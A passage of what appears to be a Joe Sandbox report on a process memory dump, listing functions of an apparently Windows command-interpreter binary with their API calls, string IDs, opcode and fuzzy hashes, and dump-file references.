                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,000587E5,00000000,?,00044A0A), ref: 0006484A
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,000587E5,00000000,?,00044A0A), ref: 00064879
                                                                      • _getch.MSVCRT ref: 0006487F
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000587E5,00000000,?,00044A0A), ref: 00064897
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000587E5,00000000,?,00044A0A), ref: 000648AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                      • String ID:
                                                                      • API String ID: 491502236-0
                                                                      • Opcode ID: e9dc111819dc48992bd74bfa7b7db3d2f8b70987400dfa1866574633fa8f5c0a
                                                                      • Instruction ID: 09a3e862e7418d1e0d2c049445c95ea48c8290195958120ac39eb4829800d65c
                                                                      • Opcode Fuzzy Hash: e9dc111819dc48992bd74bfa7b7db3d2f8b70987400dfa1866574633fa8f5c0a
                                                                      • Instruction Fuzzy Hash: C801D471504360AFFB146BA0EC0EB9E3BA5EF02720F10012AF945961A1DF7D9980CB65
                                                                      Function 00046488 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00046513: memset.MSVCRT ref: 00046593
                                                                        • Part of subcall function 0004DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00048E86,00048E5A,00000000), ref: 0004DC98
                                                                        • Part of subcall function 0004DC60: RtlFreeHeap.NTDLL(00000000), ref: 0004DC9F
                                                                      • memset.MSVCRT ref: 0005A097
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heapmemset$FreeProcess
                                                                      • String ID: *.*
                                                                      • API String ID: 1291122668-438819550
                                                                      • Opcode ID: b4359efe63a5c85eb8fff555399eec35d103151b1e58cd33a2ba9d911bfc4235
                                                                      • Instruction ID: 8d31cf54ceb872109561adeb8085f61ac5baff0b4ba17097508a3c0a9a5911d6
                                                                      • Opcode Fuzzy Hash: b4359efe63a5c85eb8fff555399eec35d103151b1e58cd33a2ba9d911bfc4235
                                                                      • Instruction Fuzzy Hash: F8B1BEB1E002059BCF64DFA8C882AEFB7B5EF5A701F144269EC05AB242E731DD45CB95
                                                                      Function 00065948 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00065997
                                                                        • Part of subcall function 0004AB7F: iswspace.MSVCRT ref: 0004AB8D
                                                                        • Part of subcall function 0004AB7F: wcschr.MSVCRT ref: 0004AB9E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Enumiswspacewcschr
                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                      • API String ID: 3493821229-3301834661
                                                                      • Opcode ID: 83ac439f15dd0936d92432c84cdffb8f519c17430c342a032bc9c4036ec8dd9a
                                                                      • Instruction ID: 06245e1625d28b87f3f64744cee791934e1c030b99c3501610faad42b594a814
                                                                      • Opcode Fuzzy Hash: 83ac439f15dd0936d92432c84cdffb8f519c17430c342a032bc9c4036ec8dd9a
                                                                      • Instruction Fuzzy Hash: 48814BB1E006195BDB349B68CC95BFE73BBEF84701F1441B9E40A97241EB709E81CB95
                                                                      Function 0004CCD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                      • API String ID: 0-1704545398
                                                                      • Opcode ID: abd34010544c0ce127d61ec00e7b6f7f34e15cd63c229571aa42374a96d3dc89
                                                                      • Instruction ID: 02d83750b37eb5cd9bf11823a65e552da1f2285d20fdeb1144e010ab75233c8b
                                                                      • Opcode Fuzzy Hash: abd34010544c0ce127d61ec00e7b6f7f34e15cd63c229571aa42374a96d3dc89
                                                                      • Instruction Fuzzy Hash: 6D515CF1E0110296FBF47F64D845FBA36A2FB50314F14403AD8479B292EBB99C84C79A
                                                                      Function 00064DBD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: iswdigit$wcstol
                                                                      • String ID: aApP
                                                                      • API String ID: 644763121-2547155087
                                                                      • Opcode ID: 1ca208865ad37f7b0c7149d3bbca93c9a8cd45259e22be6ea2bdc931b35a8f1a
                                                                      • Instruction ID: 94123003615cb27910f495296a463ae1645ab3360e55dbdb0c3ad2a56d2b203b
                                                                      • Opcode Fuzzy Hash: 1ca208865ad37f7b0c7149d3bbca93c9a8cd45259e22be6ea2bdc931b35a8f1a
                                                                      • Instruction Fuzzy Hash: D0410575B0022286DF64DF68C8916BFB3E6FF95700B15443AE946DB281EA36DD42C3A1
                                                                      Function 0006B222 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006B25E
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • _wcslwr.MSVCRT ref: 0006B2D2
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 0006B30B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_wcslwr
                                                                      • String ID: [%s]
                                                                      • API String ID: 886762496-302437576
                                                                      • Opcode ID: 735e6a0130cefc7350e62052df9b91b8148feed1cec17ea7a6278364b18a7b6b
                                                                      • Instruction ID: 0e2c720ab30570666b44943680d266d81c5b20f4325835117903ea435218cee2
                                                                      • Opcode Fuzzy Hash: 735e6a0130cefc7350e62052df9b91b8148feed1cec17ea7a6278364b18a7b6b
                                                                      • Instruction Fuzzy Hash: 683182B1B0021A6BDB10DBA9D8D5BEEB7F9AF19314F040069E505E3242DB78DE848B50
                                                                      Function 00049E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00049E8E: iswspace.MSVCRT ref: 00049E9E
                                                                      • iswspace.MSVCRT ref: 00049E28
                                                                      • _wcsnicmp.MSVCRT ref: 00049E79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: iswspace$_wcsnicmp
                                                                      • String ID: off
                                                                      • API String ID: 3989682491-733764931
                                                                      • Opcode ID: d2be550b245426ee82989c096093cf2a276904d170792ddfd54f646db7cd44f6
                                                                      • Instruction ID: 855a1f1737e0d331c6dceca596edf943e70e324b04b3b13a5b00adecd6e12c38
                                                                      • Opcode Fuzzy Hash: d2be550b245426ee82989c096093cf2a276904d170792ddfd54f646db7cd44f6
                                                                      • Instruction Fuzzy Hash: 831108F1704311AAEB74E2AB5C1AB3F52949BC1B69B29003EFD46D70C1EA458D41D1A9
                                                                      Function 00065166 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0005727B: __iob_func.MSVCRT ref: 00057280
                                                                      • fprintf.MSVCRT ref: 00065182
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: __iob_funcfprintf
                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                      • API String ID: 620453056-2781220306
                                                                      • Opcode ID: 315c8b437262163d97b56be2caf99327b94cd010300c7c3d7f41ddb23c660fd2
                                                                      • Instruction ID: 40264e50666708b131de604079db3a29a173909bdee120827997900a73341069
                                                                      • Opcode Fuzzy Hash: 315c8b437262163d97b56be2caf99327b94cd010300c7c3d7f41ddb23c660fd2
                                                                      • Instruction Fuzzy Hash: 4D01FE37A40F029AD7343B5CBC02BA373A1DBD2322B15053BED9E9B140F6A05D428184
                                                                      Function 00063500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 0006351B
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0006352C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                      • API String ID: 1646373207-582119455
                                                                      • Opcode ID: 1537cf8e5519e70c1e0809c694202cdaac210af46bd9499073e5e6dcdafaaaa2
                                                                      • Instruction ID: b3c3c38888fff84b1be9d361fed1a0a4bea1ebded06b831d90f117db5c0c3888
                                                                      • Opcode Fuzzy Hash: 1537cf8e5519e70c1e0809c694202cdaac210af46bd9499073e5e6dcdafaaaa2
                                                                      • Instruction Fuzzy Hash: D7E09231B01B308BBF616B34BD0855A3BD5B745B603051056E84ADB211D7688D418FD1
                                                                      Function 000638F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 000638FB
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00063907
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                      • API String ID: 1646373207-919018592
                                                                      • Opcode ID: 0e1b9a07d04cef478f88872ea2c9698ee73fd56e49bd31844bdbf3210366cce3
                                                                      • Instruction ID: 4c624293a6ae3176bb11bd7a474a6dffbfa190a62e8448590bef37697a980818
                                                                      • Opcode Fuzzy Hash: 0e1b9a07d04cef478f88872ea2c9698ee73fd56e49bd31844bdbf3210366cce3
                                                                      • Instruction Fuzzy Hash: 97E0C272640328BB9F211FA1DC0DC8FBF29FB457B17000022FA0886520CA7AC910CFE1
                                                                      Function 0004AA75 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsnicmp$wcschr
                                                                      • String ID:
                                                                      • API String ID: 3270668897-0
                                                                      • Opcode ID: e2120f48f032633bab48fd5f96371964f173ae32302ea74355a05a99c445970b
                                                                      • Instruction ID: ce96962da4c440c8eac5f0c86aca9c44c5c57daaf1850f22e1c912d7b11b3b9a
                                                                      • Opcode Fuzzy Hash: e2120f48f032633bab48fd5f96371964f173ae32302ea74355a05a99c445970b
                                                                      • Instruction Fuzzy Hash: 365159797003159FEB64EB688851A7F77E5EF85705B14402DEC829B282EBB44E42C3D6
                                                                      Function 00051CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D3A
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D44
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D57
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D61
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$FullNamePath
                                                                      • String ID:
                                                                      • API String ID: 268959451-0
                                                                      • Opcode ID: 74859a88626658e6fb8056ac0dd4815702165dfb3cb8fde157b6ba111d05ee39
                                                                      • Instruction ID: d31f6165e3463f24ef782e805c2952c6c4236777a5e74139351b661a82baf4bc
                                                                      • Opcode Fuzzy Hash: 74859a88626658e6fb8056ac0dd4815702165dfb3cb8fde157b6ba111d05ee39
                                                                      • Instruction Fuzzy Hash: 34315A79100101ABDB38DF68C855ABFB3B5EF44301728892DED468B290E779AE49C750
                                                                      Function 0004C570 Relevance: 6.1, APIs: 4, Instructions: 101memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0004C5BD
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 0004C5C4
                                                                      • _setjmp3.MSVCRT ref: 0004C630
                                                                      • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0004C69D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                      • String ID:
                                                                      • API String ID: 2613391085-0
                                                                      • Opcode ID: 81334028ae59c6c0b54de96bbbc27c511fa88b2fa536f1b853f084cc39364d1a
                                                                      • Instruction ID: b9be5693ac97178bb3cc43347b784aee18c7af8034d22d675aba505f972eb8d3
                                                                      • Opcode Fuzzy Hash: 81334028ae59c6c0b54de96bbbc27c511fa88b2fa536f1b853f084cc39364d1a
                                                                      • Instruction Fuzzy Hash: DC3180B0F06A018BFB94DF68D845B5A77E4F744744F15803AD80EE7250D77E9884CBA9
                                                                      Function 000662B3 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,0006CD20,0000001C,000658DF), ref: 000662E6
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,0006CD20,0000001C,000658DF), ref: 00066301
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00066340
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0006635D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$ErrorLastOpen
                                                                      • String ID:
                                                                      • API String ID: 4270309053-0
                                                                      • Opcode ID: 58a070adb72c5ebb81aec38723dee2421809d22f37c51203debe866f746b1eb3
                                                                      • Instruction ID: 04ced80124c30dd2cadbb51989231254791e7ab0360106cecc80a6c2b93928b1
                                                                      • Opcode Fuzzy Hash: 58a070adb72c5ebb81aec38723dee2421809d22f37c51203debe866f746b1eb3
                                                                      • Instruction Fuzzy Hash: 392131B1E01229AFEB209FD8DC919EEB6FDFB49750F14412AE501F3241D7769D008BA5
                                                                      Function 00052960 Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • wcstol.MSVCRT ref: 00052977
                                                                      • wcstol.MSVCRT ref: 00052987
                                                                      • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0004E559,?,?,00000000,?), ref: 000529FF
                                                                      • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0004E559,?,?,00000000,?), ref: 00052A09
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcstol$lstrcmplstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 4273384694-0
                                                                      • Opcode ID: 247a140bdd6b99a0ec45ddad87a945cefb470e53e903456b860bba6c87f6bf89
                                                                      • Instruction ID: 8347f7254bdf11959b796def4c79d614a9534eaf021417125f015378a1ea281a
                                                                      • Opcode Fuzzy Hash: 247a140bdd6b99a0ec45ddad87a945cefb470e53e903456b860bba6c87f6bf89
                                                                      • Instruction Fuzzy Hash: A4110332900126BB9B765B788A0C97FBBA8FF03352F160210EC01E7B10D365ED58E6E1
                                                                      Function 0006C535 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006C56B
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0006C5A5
                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0006C5BD
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 0006C5DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                      • String ID:
                                                                      • API String ID: 1029679093-0
                                                                      • Opcode ID: 7f1cbfb180359b975b9c077ce6049a0a232d33880d987f802d3f63bc94240ff6
                                                                      • Instruction ID: b3a4af3c0c1164cd00c0dcbf2886f75d8b471232693ad2eaa15b8bdca3cf349f
                                                                      • Opcode Fuzzy Hash: 7f1cbfb180359b975b9c077ce6049a0a232d33880d987f802d3f63bc94240ff6
                                                                      • Instruction Fuzzy Hash: BA216371B002596BFB10DBA5DC89FBFBBF9FB44344F040469A545D3141D778EA848B61
                                                                      Function 00054C40 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
